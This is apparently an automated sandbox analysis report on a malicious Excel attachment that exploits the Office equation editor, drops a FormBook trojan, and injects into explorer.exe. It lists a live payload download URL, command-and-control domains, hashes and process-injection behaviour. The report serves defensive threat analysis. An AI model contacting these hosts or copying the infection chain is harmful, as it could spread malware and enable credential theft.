Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\cmd.exe | Thread register set: target process: 1764
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File sources: the same 20 unpacked-PE and memory sources listed for this signature under Stealing of Sensitive Information above.

MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 321 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 11 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Information Discovery 113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

            Behavior Graph

Behavior Graph ID: 552850 | Sample: RFQ HCI20220113.xlsx | Start date: 13/01/2022 | Architecture: WINDOWS | Score: 100
Process chain shown in the graph (the graphic itself is not reproduced): EXCEL.EXE and EQNEDT32.EXE are started; EXCEL.EXE drops C:\Users\user\...\~$RFQ HCI20220113.xlsx (data). EQNEDT32.EXE connects to 198.23.213.59 port 80 (AS-COLOCROSSINGUS, United States), drops C:\Users\user\AppData\Local\...\vbc[1].exe and C:\Users\Public\vbc.exe (PE32) and starts vbc.exe (Office equation editor starts processes, likely CVE 2017-11882 or CVE-2018-0802). vbc.exe starts a second vbc.exe, which injects into explorer.exe (thread injection, section mapping, process hollowing, APC queuing). explorer.exe connects to ecommerceoptimise.com (192.185.98.251 port 80) and terapiaholisticaemformacao.com (216.172.160.188 port 80), both UNIFIEDLAYER-AS-1US, United States, plus 8 other IPs or domains, and starts cmd.exe, which again shows thread injection, section mapping and RDTSC-based virtualization detection. The graph also lists www.norfg.com.


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

Source | Detection | Scanner | Label
RFQ HCI20220113.xlsx | 34% | Virustotal |
RFQ HCI20220113.xlsx | 30% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

            Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\vbc.exe | 100% | Avira | HEUR/AGEN.1211287
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Avira | HEUR/AGEN.1211287
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 44% | ReversingLabs | ByteCode-MSIL.Trojan.Bulz
C:\Users\Public\vbc.exe | 44% | ReversingLabs | ByteCode-MSIL.Trojan.Bulz

            Unpacked PE Files

Source | Detection | Scanner | Label
5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.vbc.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.vbc.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.vbc.exe.11a0000.2.unpack | 100% | Avira | HEUR/AGEN.1211287
5.0.vbc.exe.11a0000.6.unpack | 100% | Avira | HEUR/AGEN.1211287
5.0.vbc.exe.11a0000.8.unpack | 100% | Avira | HEUR/AGEN.1211287
5.0.vbc.exe.11a0000.1.unpack | 100% | Avira | HEUR/AGEN.1211287
5.2.vbc.exe.11a0000.4.unpack | 100% | Avira | HEUR/AGEN.1211287
5.0.vbc.exe.11a0000.0.unpack | 100% | Avira | HEUR/AGEN.1211287
5.0.vbc.exe.11a0000.10.unpack | 100% | Avira | HEUR/AGEN.1211287
4.0.vbc.exe.11a0000.0.unpack | 100% | Avira | HEUR/AGEN.1211287
5.0.vbc.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.vbc.exe.11a0000.3.unpack | 100% | Avira | HEUR/AGEN.1211287
5.0.vbc.exe.11a0000.4.unpack | 100% | Avira | HEUR/AGEN.1211287
4.2.vbc.exe.11a0000.2.unpack | 100% | Avira | HEUR/AGEN.1211287

            Domains

Source | Detection | Scanner | Label
www.norfg.com | 0% | Virustotal |
terapiaholisticaemformacao.com | 4% | Virustotal |

            URLs

Source | Detection | Scanner | Label
http://java.sun.com | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://198.23.213.59/1155/vbc.exe | 100% | Avira URL Cloud | malware
http://www.orphe.biz/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== | 0% | Avira URL Cloud | safe
http://www.ecommerceoptimise.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== | 0% | Avira URL Cloud | safe
http://www.integratedheartspsychology.com/i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
www.topeasyip.company/i5nb/ | 100% | Avira URL Cloud | malware
http://www.bjbwx114.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
http://www.circlessalaries.com/i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr | 0% | Avira URL Cloud | safe
http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== | 100% | Avira URL Cloud | malware

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ecommerceoptimise.com | 192.185.98.251 | true | true | | unknown
www.norfg.com | 43.134.0.76 | true | false | | unknown
terapiaholisticaemformacao.com | 216.172.160.188 | true | true | | unknown
www.circlessalaries.com | 195.211.74.112 | true | true | | unknown
www.ylhwcl.com | 122.10.28.11 | true | true | | unknown
www.bjbwx114.com | 23.80.120.93 | true | true | | unknown
www.integratedheartspsychology.com | 221.121.143.148 | true | true | | unknown
www.orphe.biz | 103.224.212.220 | true | true | | unknown
www.terapiaholisticaemformacao.com | unknown | unknown | true | | unknown
www.topeasyip.company | unknown | unknown | true | | unknown
www.ecommerceoptimise.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://198.23.213.59/1155/vbc.exe | true | Avira URL Cloud: malware | unknown
http://www.orphe.biz/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== | true | Avira URL Cloud: safe | unknown
http://www.ecommerceoptimise.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== | true | Avira URL Cloud: safe | unknown
http://www.integratedheartspsychology.com/i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr | true | Avira URL Cloud: safe | unknown
www.topeasyip.company/i5nb/ | true | Avira URL Cloud: malware | low
http://www.bjbwx114.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== | true | Avira URL Cloud: safe | unknown
http://www.circlessalaries.com/i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr | true | Avira URL Cloud: safe | unknown
http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp | false |  | high
http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | false |  | high
http://java.sun.com | explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://investor.msn.com | explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | false |  | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | false |  | high
http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmp | false |  | high
http://investor.msn.com/ | explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | false |  | high
http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.509280979.0000000004513000.00000004.00000001.sdmp | false |  | high
http://www.%s.comPA | explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | false |  | high
https://support.mozilla.org | explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | false |  | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | false |  | high
http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.501432004.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

Contacted IPs

• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
103.224.212.220 | www.orphe.biz | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true
221.121.143.148 | www.integratedheartspsychology.com | Australia | 45671 | AS45671-NET-AUWholesaleServicesProviderAU | true
216.172.160.188 | terapiaholisticaemformacao.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
23.80.120.93 | www.bjbwx114.com | United States | 395954 | LEASEWEB-USA-LAX-11US | true
195.211.74.112 | www.circlessalaries.com | Netherlands | 51696 | ANTAGONIST-ASNL | true
122.10.28.11 | www.ylhwcl.com | Hong Kong | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true
198.23.213.59 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
192.185.98.251 | ecommerceoptimise.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 552850
Start date: 13.01.2022
Start time: 20:20:36
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 41s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: RFQ HCI20220113.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@7/18@9/8
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 30.5% (good quality ratio 28.1%)
• Quality average: 67.3%
• Quality standard deviation: 31.4%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
• TCP Packets have been reduced to 100
• Not all processes were analyzed; report is missing behavior information
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
20:21:46 | API Interceptor | 62x Sleep call for process: EQNEDT32.EXE modified
20:21:49 | API Interceptor | 76x Sleep call for process: vbc.exe modified
20:22:12 | API Interceptor | 171x Sleep call for process: cmd.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASN

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:downloaded
                                                  Size (bytes):417792
                                                  Entropy (8bit):7.729098788142576
                                                  Encrypted:false
                                                  SSDEEP:12288:gyK777777777777OPMfcmnxTLrXEQ0/Ll1PishiMkNMfPjJ8W:jK777777777777OKLQR1Pf+aP6W
                                                  MD5:83AC585E99B527EEB278702F8F711568
                                                  SHA1:A576A927B067C94CDBC1E7B353F60577F5B310F9
                                                  SHA-256:9E2502B3945F31482623E8E61DCB85B9EBB7D9A4244D9074FA289596C9DA513E
                                                  SHA-512:F4A5F197CCA552237CA4CA0DBDBA4AF5E5C0F6BCA7A05313A61D96C5021049EDEB0B38D8E4AD5EE3B062692038F05254787A57C5C1A0E951E9A9B9F091A304AC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 44%
                                                  Reputation:low
                                                  IE Cache URL:http://198.23.213.59/1155/vbc.exe
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H?.a.................V..........:u... ........@.. ....................................@..................................t..W.................................................................................... ............... ..H............text...@U... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B.................u......H.......|F..d.......-....]..............................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....oc...*..{....*.s..
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15A5C04C.emf
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):1628828
                                                  Entropy (8bit):2.229123093390047
                                                  Encrypted:false
                                                  SSDEEP:3072:UVMqDjXlNqlVkXFL4we9ANp7RySvRaXGcmfBEtAPrcccccsF8WccccccccF9cccC:ULjXlN0k1fKANpFZIiByA764
                                                  MD5:E5B435F23CA21C551E2EB0AD7511289A
                                                  SHA1:139160E066DA9E9E7DBD234C5B554CCEBE307138
                                                  SHA-256:2A64589D13E424512714FD43F0AD13D4870489D7D5DF1CB86A6A6AC84560D3EF
                                                  SHA-512:3E576211D088A0ECDE7D572CFE9684E84154E3191FAFF9A2C42E3E007006FE95FFD87E4EE6781A5DB5C6C394A4D7A2B85F651E9499DBEF019074EFA84972AFED
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ....l...........................m>...&.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................Tz$........f^z.@~.%...............D.......RQ.VD...<...........(...$Q.VD...<... ...Id^z<...D... ............d^z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X...<...p....8Vz........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\220FF079.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 135 x 175, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):9240
                                                  Entropy (8bit):7.9386613011729015
                                                  Encrypted:false
                                                  SSDEEP:192:xgohZDgqajF3w9dfa2EbNBdO31HC6xeiPUe8wO4szk6PwFUdSFepGh:CohZgqajWfa2ExbB23U4OkawF8SFegh
                                                  MD5:C19636DBD6A1B9428BCB8758E04F5FC7
                                                  SHA1:BD5F5490EB4FDFB9A8161A6F77B6440520136473
                                                  SHA-256:C7F22E5E13D15601B865F0DE1FDAB380218CE085DAB19B0A2F28ACA4A670A88E
                                                  SHA-512:F63D1E715EEAF2F93338F40DE2EAB6550483F1FAD430ED94AF0649AE7B073E2929796D43800E9CFC086D0F0C2EC18D2A8487B19F9071EECCE3CE777B25600B36
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...............=c....tEXtSoftware.Adobe ImageReadyq.e<...~iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:DocumentID="xmp.did:EDC9411A6A5F11E2838BB9184F90E845" xmpMM:InstanceID="xmp.iid:EDC941196A5F11E2838BB9184F90E845" xmp:CreatorTool="Adobe Photoshop CS2 Windows"> <xmpMM:DerivedFrom stRef:instanceID="uuid:5A79598F285EDB11B275CB8CE9AFFC64" stRef:documentID="adobe:docid:photoshop:51683bff-375b-11d9-ab90-a923e782e0b8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...F....PLTE..............
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29ED4C58.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3747
                                                  Entropy (8bit):7.932023348968795
                                                  Encrypted:false
                                                  SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                                  MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                                  SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                                  SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                                  SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                                  Malicious:false
                                                  Preview: .PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD030D5.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3747
                                                  Entropy (8bit):7.932023348968795
                                                  Encrypted:false
                                                  SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                                  MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                                  SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                                  SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                                  SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                                  Malicious:false
                                                  Preview: .PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7BD458D2.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 135 x 175, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):9240
                                                  Entropy (8bit):7.9386613011729015
                                                  Encrypted:false
                                                  SSDEEP:192:xgohZDgqajF3w9dfa2EbNBdO31HC6xeiPUe8wO4szk6PwFUdSFepGh:CohZgqajWfa2ExbB23U4OkawF8SFegh
